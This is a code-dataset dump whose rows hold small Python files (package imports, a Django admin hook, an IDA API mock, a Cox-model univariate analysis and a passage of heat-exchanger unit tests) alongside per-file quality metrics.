hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d8dd6f3d149d91791e939ec5c7b8aa6217eba907 | 337 | py | Python | strimadec/models/modules/__init__.py | borea17/StrImaDec | 711e14d50ff816585b43c1509355983738b45ecb | [
"MIT"
] | null | null | null | strimadec/models/modules/__init__.py | borea17/StrImaDec | 711e14d50ff816585b43c1509355983738b45ecb | [
"MIT"
] | null | null | null | strimadec/models/modules/__init__.py | borea17/StrImaDec | 711e14d50ff816585b43c1509355983738b45ecb | [
"MIT"
] | null | null | null | from strimadec.models.modules.VAE import VAE
from strimadec.models.modules.CNN_VAE import CNN_VAE
from strimadec.models.modules.BaselineNet import BaselineNet
from strimadec.models.modules.LocalizationNet import LocalizationNet
from strimadec.models.modules.RNN import RNN
from strimadec.models.modules.AIR_BaseClass import AIR_BaseClass | 56.166667 | 68 | 0.878338 | 46 | 337 | 6.347826 | 0.26087 | 0.267123 | 0.390411 | 0.534247 | 0.19863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068249 | 337 | 6 | 69 | 56.166667 | 0.929936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d8ecf94e5a34ee733ca625e4355d8a07fbd71222 | 138 | py | Python | tests/inspectdb/admin.py | agilentia/django-salesforce | cb71f30452aee7d1f990eb7184085d87376fb36e | [
"MIT"
] | 251 | 2015-01-15T11:39:21.000Z | 2022-03-28T10:52:10.000Z | tests/inspectdb/admin.py | agilentia/django-salesforce | cb71f30452aee7d1f990eb7184085d87376fb36e | [
"MIT"
] | 196 | 2015-01-09T01:29:37.000Z | 2022-03-19T19:35:09.000Z | tests/inspectdb/admin.py | agilentia/django-salesforce | cb71f30452aee7d1f990eb7184085d87376fb36e | [
"MIT"
] | 68 | 2015-01-12T18:13:13.000Z | 2022-03-23T11:16:14.000Z | from salesforce.testrunner.example.universal_admin import register_omitted_classes
from . import models
register_omitted_classes(models)
| 27.6 | 82 | 0.884058 | 17 | 138 | 6.882353 | 0.647059 | 0.25641 | 0.376068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072464 | 138 | 4 | 83 | 34.5 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9978f8bbe7c5b03c64bfc8b55f53d88ae30e4d93 | 485 | py | Python | tests/mockidaapi.py | BinaryAnalysisPlatform/bap-ida-python | d8d4679de2f50bb75f556419565821d95404034e | [
"MIT"
] | 81 | 2016-06-10T19:07:12.000Z | 2022-03-23T08:15:41.000Z | tests/mockidaapi.py | BinaryAnalysisPlatform/bap-ida-python | d8d4679de2f50bb75f556419565821d95404034e | [
"MIT"
] | 22 | 2016-06-16T19:35:59.000Z | 2020-12-10T14:53:38.000Z | tests/mockidaapi.py | BinaryAnalysisPlatform/bap-ida-python | d8d4679de2f50bb75f556419565821d95404034e | [
"MIT"
] | 29 | 2016-06-10T18:26:04.000Z | 2022-02-14T06:15:30.000Z | # flake8: noqa
ASKBTN_YES = 0
ASKBTN_NO = 0
ASKBTN_CANCEL = 0
PLUGIN_DRAW = 0
PLUGIN_HIDE = 0
PLUGIN_KEEP = 0
PLUGIN_FIX = 0
class plugin_t(object): pass
class text_sink_t(object): pass
class Choose2(object): pass
def idadir(sub): return NotImplemented
def get_cmt(ea, off): return NotImplemented
def set_cmt(ea, off): return NotImplemented
def askyn_c(dflt, title): return NotImplemented
def get_input_file_path() : return NotImplemented
def get_segm_name(ea): return NotImplemented
| 25.526316 | 49 | 0.791753 | 78 | 485 | 4.692308 | 0.487179 | 0.327869 | 0.314208 | 0.213115 | 0.169399 | 0.169399 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.127835 | 485 | 18 | 50 | 26.944444 | 0.843972 | 0.024742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.1875 | 0 | 0.375 | 0.5625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
41ff666cd48bcad470be1b74b59fee9b8bd04243 | 137 | py | Python | rfcn/symbols/__init__.py | YAMLONG/Deformable-ConvNets | ea937451e103ba1fbf4fdcbd08ef3ca1ca832ef4 | [
"Apache-2.0"
] | null | null | null | rfcn/symbols/__init__.py | YAMLONG/Deformable-ConvNets | ea937451e103ba1fbf4fdcbd08ef3ca1ca832ef4 | [
"Apache-2.0"
] | null | null | null | rfcn/symbols/__init__.py | YAMLONG/Deformable-ConvNets | ea937451e103ba1fbf4fdcbd08ef3ca1ca832ef4 | [
"Apache-2.0"
] | null | null | null | import resnet_v1_101_rfcn
import resnet_v1_101_rfcn_dcn
import deform_conv_demo
import deform_psroi_demo
import resnet_v1_101_rfcn_light
| 22.833333 | 31 | 0.927007 | 25 | 137 | 4.48 | 0.44 | 0.321429 | 0.375 | 0.455357 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094488 | 0.072993 | 137 | 5 | 32 | 27.4 | 0.787402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
85262588b7274bb974e3f5c5663002ebe04e9b8d | 812 | py | Python | src/djai/data/api/__init__.py | Django-AI/DjAI | 85e624de78726ac52f42580121e1a04efe2da2d7 | [
"MIT"
] | 3 | 2021-12-03T13:53:17.000Z | 2021-12-15T11:51:52.000Z | src/djai/data/api/__init__.py | Django-AI/DjAI | 85e624de78726ac52f42580121e1a04efe2da2d7 | [
"MIT"
] | null | null | null | src/djai/data/api/__init__.py | Django-AI/DjAI | 85e624de78726ac52f42580121e1a04efe2da2d7 | [
"MIT"
] | 1 | 2022-01-31T08:57:16.000Z | 2022-01-31T08:57:16.000Z | """DjAI Data API."""
from sys import version_info
from djai.data.models import (
DataSchema, DataSet,
InDBJSONDataSet, JSONDataSet,
NumPyArray, PandasDataFrame,
AudioDataSet,
CSVDataSet,
HDFDataSet,
ImageDataSet,
ORCDataSet,
ParquetDataSet,
TextDataSet,
TFRecordDataSet,
VideoDataSet,
LiveAPIDataSource,
)
if version_info >= (3, 9):
from collections.abc import Sequence
else:
from typing import Sequence
__all__: Sequence[str] = (
'DataSchema', 'DataSet',
'InDBJSONDataSet', 'JSONDataSet',
'NumPyArray', 'PandasDataFrame',
'AudioDataSet',
'CSVDataSet',
'HDFDataSet',
'ImageDataSet',
'ORCDataSet',
'ParquetDataSet',
'TextDataSet',
'TFRecordDataSet',
'VideoDataSet',
'LiveAPIDataSource',
)
| 16.571429 | 40 | 0.660099 | 63 | 812 | 8.412698 | 0.555556 | 0.030189 | 0.120755 | 0.162264 | 0.720755 | 0.720755 | 0.720755 | 0.720755 | 0.720755 | 0.720755 | 0 | 0.0032 | 0.230296 | 812 | 48 | 41 | 16.916667 | 0.8448 | 0.017241 | 0 | 0 | 0 | 0 | 0.241162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.114286 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
517069b1bd4e2156d870aa839ce002b08576754e | 1,411 | py | Python | py/univariate_analysis.py | vittoriofortino84/OnlineLearningForBD | f31dfbf71729b19a80ea1ada8ac1d03c83637352 | [
"MIT"
] | null | null | null | py/univariate_analysis.py | vittoriofortino84/OnlineLearningForBD | f31dfbf71729b19a80ea1ada8ac1d03c83637352 | [
"MIT"
] | null | null | null | py/univariate_analysis.py | vittoriofortino84/OnlineLearningForBD | f31dfbf71729b19a80ea1ada8ac1d03c83637352 | [
"MIT"
] | null | null | null | import pandas as pd
from cox_model import CoxModel, LifelinesCoxModel
def univariate_analysis(x, y, model: CoxModel = LifelinesCoxModel(), alpha=0.0):
res = pd.DataFrame(columns=['feature', 'score', 'p_val', 'coefficient'])
pos = 0
for feat_name in x:
feat_df = x[[feat_name]]
feat_predictor = model.fit_estimator(x_train=feat_df, y_train=y, alpha=alpha)
score = feat_predictor.score(x_test=feat_df, y_test=y)
p_val = feat_predictor.p_vals()[0]
coefficient = feat_predictor.params()[feat_name]
res.loc[pos] = [feat_name, score, p_val, coefficient]
pos += 1
res.sort_values(by=['p_val'], inplace=True, ignore_index=True)
return res
def univariate_analysis_with_covariates(x, y, cov, model: CoxModel = LifelinesCoxModel(), alpha=0.0):
res = pd.DataFrame(columns=['feature', 'score', 'p_val', 'coefficient'])
pos = 0
for feat_name in x:
feat_df = pd.concat(objs=[cov, x[[feat_name]]], axis=1)
feat_predictor = model.fit_estimator(x_train=feat_df, y_train=y, alpha=alpha)
score = feat_predictor.score(x_test=feat_df, y_test=y)
p_val = feat_predictor.p_vals()[feat_name]
coefficient = feat_predictor.params()[feat_name]
res.loc[pos] = [feat_name, score, p_val, coefficient]
pos += 1
res.sort_values(by=['p_val'], inplace=True, ignore_index=True)
return res
| 39.194444 | 101 | 0.671155 | 208 | 1,411 | 4.302885 | 0.254808 | 0.080447 | 0.040223 | 0.089385 | 0.811173 | 0.811173 | 0.811173 | 0.811173 | 0.811173 | 0.811173 | 0 | 0.008818 | 0.196315 | 1,411 | 35 | 102 | 40.314286 | 0.780423 | 0 | 0 | 0.714286 | 0 | 0 | 0.046842 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
517b534ba5c55e598c7bdeb8aa94157e4c0ae84b | 34 | py | Python | tests/test_addons/a_lib.py | lexman/tuttle | dab07db4a1e3e18c876deb2897c07be3935acd60 | [
"MIT"
] | 26 | 2015-10-08T17:12:56.000Z | 2021-10-21T14:47:22.000Z | tests/test_addons/a_lib.py | Pandinosaurus/tuttle | dab07db4a1e3e18c876deb2897c07be3935acd60 | [
"MIT"
] | 11 | 2015-10-09T12:37:15.000Z | 2018-04-01T15:47:49.000Z | tests/test_addons/a_lib.py | Pandinosaurus/tuttle | dab07db4a1e3e18c876deb2897c07be3935acd60 | [
"MIT"
] | 3 | 2016-03-29T17:15:41.000Z | 2018-11-16T13:39:31.000Z | def a_function():
return '42'
| 11.333333 | 17 | 0.617647 | 5 | 34 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.235294 | 34 | 2 | 18 | 17 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
51b1f274154111c32893c63a58a706cfad811a2d | 66 | py | Python | at_ml/__init__.py | mhasanbulli/at_ml | 9fb6508e26cf7f48ad9be2221c168337b1b25ae3 | [
"MIT"
] | null | null | null | at_ml/__init__.py | mhasanbulli/at_ml | 9fb6508e26cf7f48ad9be2221c168337b1b25ae3 | [
"MIT"
] | null | null | null | at_ml/__init__.py | mhasanbulli/at_ml | 9fb6508e26cf7f48ad9be2221c168337b1b25ae3 | [
"MIT"
] | null | null | null | from at_ml.dataset import dataset
from at_ml.model import lof_lgbm | 33 | 33 | 0.863636 | 13 | 66 | 4.153846 | 0.615385 | 0.222222 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106061 | 66 | 2 | 34 | 33 | 0.915254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cfbab5b9527e81478b93342c727e7a823140608e | 63,291 | py | Python | unit_tests/test_heat_exchanger.py | J-A-St/moc_retrofit_ga_de | ddb5a6b04c8a354399693fac40a667f43b7bb577 | [
"Apache-2.0"
] | null | null | null | unit_tests/test_heat_exchanger.py | J-A-St/moc_retrofit_ga_de | ddb5a6b04c8a354399693fac40a667f43b7bb577 | [
"Apache-2.0"
] | null | null | null | unit_tests/test_heat_exchanger.py | J-A-St/moc_retrofit_ga_de | ddb5a6b04c8a354399693fac40a667f43b7bb577 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import platform
import mock
import numpy as np
operating_system = platform.system()
if operating_system == 'Windows':
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))+'\\src')
elif operating_system == 'Linux':
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))+'/src')
from read_data.read_case_study_data import CaseStudy
from heat_exchanger_network.heat_exchanger.heat_exchanger import HeatExchanger
from heat_exchanger_network.exchanger_addresses import ExchangerAddresses
from heat_exchanger_network.thermodynamic_parameter import ThermodynamicParameter
def setup_module():
"""Setup testing model"""
os.chdir(os.path.dirname(os.path.abspath(__file__)))
os.chdir('..')
test_case = CaseStudy('JonesP3.xlsx')
os.chdir('unit_tests')
test_addresses = ExchangerAddresses(test_case)
test_parameter = ThermodynamicParameter(test_case, test_addresses)
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
return test_exchanger, test_case, test_addresses, test_parameter
def test_topology():
test_exchanger, test_case, exchanger_adresses, _ = setup_module()
heat_exchanger_topology = np.array(test_case.initial_exchanger_address_matrix, dtype=int)[0, 1:9]
heat_exchanger_topology.tolist()
heat_exchanger_topology[3] = not heat_exchanger_topology[3]
heat_exchanger_topology[4] = not heat_exchanger_topology[4]
heat_exchanger_topology[5] = not heat_exchanger_topology[5]
heat_exchanger_topology[6] = not heat_exchanger_topology[6]
heat_exchanger_topology[7] = not heat_exchanger_topology[7]
exchanger_adresses.matrix[0, 0] += 1
exchanger_adresses.matrix[0, 1] += 1
exchanger_adresses.matrix[0, 2] += 1
exchanger_adresses.matrix[0, 3] = not exchanger_adresses.matrix[0, 3]
exchanger_adresses.matrix[0, 4] = not exchanger_adresses.matrix[0, 4]
exchanger_adresses.matrix[0, 5] = not exchanger_adresses.matrix[0, 5]
exchanger_adresses.matrix[0, 6] = not exchanger_adresses.matrix[0, 6]
exchanger_adresses.matrix[0, 7] = not exchanger_adresses.matrix[0, 7]
for indice in enumerate(heat_exchanger_topology):
assert heat_exchanger_topology[indice[0]] == test_exchanger.topology.address_vector[indice[0]]
assert test_exchanger.topology.initial_existent != test_exchanger.topology.existent
def test_operation_parameter():
test_exchanger, test_case, _, _ = setup_module()
initial_area = test_case.initial_exchanger_address_matrix['A_ex'][0] * 1.2
assert initial_area == test_exchanger.operation_parameter.initial_area * 1.2
def test_logarithmic_temperature_differences_no_mixer():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[250 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
for operating_case in test_case.range_operating_cases:
logarithmic_mean_temperature_difference = 400 - 350
assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case]
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
for operating_case in test_case.range_operating_cases:
logarithmic_mean_temperature_difference = (10-50) / np.log(10/50)
assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case]
def test_area():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[250 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
test_parameter.heat_loads[:, :] = 2000
hot_streams = test_case.hot_streams
cold_streams = test_case.cold_streams
topology = test_exchanger.topology
logarithmic_mean_temperature_difference = np.zeros([test_case.number_operating_cases])
areas = np.zeros([test_case.number_operating_cases])
for operating_case in test_case.range_operating_cases:
temperature_difference_1 = test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference[operating_case] = temperature_difference_1
else:
logarithmic_mean_temperature_difference[operating_case] = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
for operating_case in test_case.range_operating_cases:
overall_heat_transfer_coefficient = 1 / (1 / hot_streams[topology.hot_stream].film_heat_transfer_coefficients[operating_case] + 1 / cold_streams[topology.cold_stream].film_heat_transfer_coefficients[operating_case])
areas[operating_case] = test_exchanger.operation_parameter.heat_loads[operating_case] / (overall_heat_transfer_coefficient * test_exchanger.operation_parameter.logarithmic_mean_temperature_differences_no_mixer[operating_case])
for operating_case in test_case.range_operating_cases:
assert areas[operating_case] == test_exchanger.operation_parameter.needed_areas[operating_case]
assert np.max(areas) == test_exchanger.operation_parameter.area
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.heat_loads', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[250 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
for operating_case in test_case.range_operating_cases:
assert np.isnan(test_exchanger.operation_parameter.needed_areas[operating_case])
def test_logarithmic_temperature_differences():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
